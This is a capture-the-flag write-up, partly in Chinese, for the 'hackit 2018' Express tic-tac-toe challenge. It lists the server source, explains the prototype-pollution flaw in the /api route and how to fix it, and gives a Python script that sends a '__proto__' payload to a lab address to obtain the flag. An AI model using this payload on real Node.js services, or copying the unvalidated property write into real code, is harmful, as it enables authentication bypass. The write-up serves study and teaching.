
hackit 2018

源代码

const express = require('express')
var hbs = require('hbs');
var bodyParser = require('body-parser');
const md5 = require('md5');
var morganBody = require('morgan-body');
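const app = express();

// Empty array with no own `admintoken`; nothing in this listing ever assigns
// one, so whatever /admin reads from `user.admintoken` can only come from the
// prototype chain.
const user = []; // empty for now

// 3x3 tic-tac-toe board shared by every client; null marks an empty cell.
// (In the collapsed listing this declaration had been swallowed by the
// preceding line comment, leaving `matrix` undeclared.)
const matrix = [];
for (let i = 0; i < 3; i++) {
  matrix[i] = [null, null, null];
}

/**
 * Report whether the board is completely filled.
 *
 * @param {Array<Array<*>>} mat - 3x3 board; null marks an empty cell.
 * @returns {boolean} true when all nine cells are non-null.
 */
function draw(mat) {
  let count = 0;
  for (let i = 0; i < 3; i++) {
    for (let j = 0; j < 3; j++) {
      // Read the board that was passed in rather than the module-level one.
      if (mat[i][j] !== null) {
        count += 1;
      }
    }
  }
  return count === 9;
}

// Serve static assets from ./public.
app.use(express.static('public'));
// Parse JSON request bodies into req.body; every value in it is client-chosen.
app.use(bodyParser.json());
app.set('view engine', 'html');
// morgan-body logs request and response bodies, so anything sensitive sent to
// this app ends up in the server log.
morganBody(app);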
// Register hbs as the renderer for views with the .html extension.
app.engine('html', require('hbs').__express);

// GET / : reset the shared board to all-null cells, then render the index view.
app.get('/', (req, res) => {
  for (var i = 0; i < 3; i++){
    matrix[i] = [null , null, null];
  }
  res.render('index');
})

// GET /admin : send the flag when `user.admintoken` is truthy, a `querytoken`
// query parameter is present, and md5(user.admintoken) equals that parameter;
// otherwise answer 403.
// Security notes for readers of this challenge:
//  - `user` is an empty array with no own `admintoken`, so the lookup falls
//    through to Array.prototype / Object.prototype. Any write that reaches a
//    shared prototype therefore controls this check.
//  - The token is also written to the server log by console.log.
app.get('/admin', (req, res) => { /*this is under development I guess ??*/
  console.log(user.admintoken);
  if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
    res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');
  } else {
    res.status(403).send('Forbidden');
  }
}
)

// POST /api : place `data` at (row, col) on the shared board and reply with
// JSON {winner: 1} for 'X', {winner: 2} for 'O', {winner: 0} for a full board
// with no winner, or {winner: -1} while the game is still open.
app.post('/api', (req, res) => {
  var client = req.body;
  var winner = null;
  // This is the only validation of row/col, and it is not a type or range check:
  //  - a non-numeric string compares as NaN, so both tests are false and the
  //    value is used as a property name unchanged;
  //  - `> 3` lets the value 3 through, and matrix[3] is undefined, so the write
  //    below throws.
  if (client.row > 3 || client.col > 3){
    client.row %= 3;
    client.col %= 3;
  }
  // VULNERABLE (the point of the challenge): row and col are client-chosen
  // property names. With row "__proto__", matrix[client.row] is Array.prototype,
  // so the assignment lands on the prototype shared by every array, including
  // `user`, and is then visible as `user.admintoken` in /admin.
  // Mitigation: before writing, require Number.isInteger(row) and
  // Number.isInteger(col) within 0..2, and accept only 'X' or 'O' as data.
  matrix[client.row][client.col] = client.data;
  // Check the three rows and the three columns for a completed line.
  for(var i = 0; i < 3; i++){
    if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){
      if (matrix[i][0] === 'X') {
        winner = 1;
      }
      else if(matrix[i][0] === 'O') {
        winner = 2;
      }
    }
    if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){
      if (matrix[0][i] === 'X') {
        winner = 1;
      }
      else if(matrix[0][i] === 'O') {
        winner = 2;
      }
    }
  }
  // Main diagonal.
  if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){
    winner = 1;
  }
  if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){
    winner = 2;
  }
  // Anti-diagonal.
  if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){
    winner = 1;
  }
  if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){
    winner = 2;
  }
  if (draw(matrix) && winner === null){
    res.send(JSON.stringify({winner: 0}))
  }
  else if (winner !== null) {
    res.send(JSON.stringify({winner: winner}))
  }
  else {
    res.send(JSON.stringify({winner: -1}))
  }
})
// Start the HTTP server on port 3000 and log once it is accepting connections.
// No host argument is given, so the listener is not restricted to loopback;
// keep this intentionally vulnerable challenge app on an isolated lab network.
app.listen(3000, function onListening() {
  console.log('app listening on port 3000!');
});

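获取 flag 的条件是:请求中传入的 querytoken 必须等于 user 数组上 admintoken 的 MD5 值,且二者都必须存在。但 user 是空数组,代码中没有任何地方给它设置 admintoken;而 /api 直接把请求体里的 row、col 当作属性名写入 matrix[row][col],没有校验它们是否为 0–2 的整数,因此当 row 为 "__proto__" 时,写入的其实是 Array.prototype,所有数组(包括 user)都会继承到这个 admintoken。修复方法是在写入前校验 row、col 必须是 0–2 的整数,data 只能是 'X' 或 'O'。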

在pycharm下发送post请求测试 

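# Test client for the challenge server listed above. The target is a private
# lab address running the deliberately vulnerable app.
import json

import requests

url = "http://192.168.17.1:3000/api"
# The server listing registers the admin route as GET /admin; there is no
# /api/admin route. The querytoken has to equal md5() of the value written
# below for the /admin check to pass; the digest is taken from the write-up
# as-is and is not verified here.
url1 = "http://192.168.17.1:3000/admin?querytoken=5881ca97cfe9782358a88e0b31092814"
heads = {"Content-type": "application/json"}

# The server uses "row" and "col" as property names without validating them,
# so "__proto__" makes the write land on Array.prototype instead of a board
# cell. A server that validates row/col as integers 0..2 rejects this body.
data = {"row": "__proto__", "col": "admintoken", "data": "oupeng"}

# Pass the header dict defined above. The original passed `headers`, a module
# pulled in by a stray `from wsgiref import headers` import, which is not a
# mapping of header fields.
res1 = requests.post(url, headers=heads, data=json.dumps(data))
res2 = requests.get(url1)
print(res2.text)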

结果

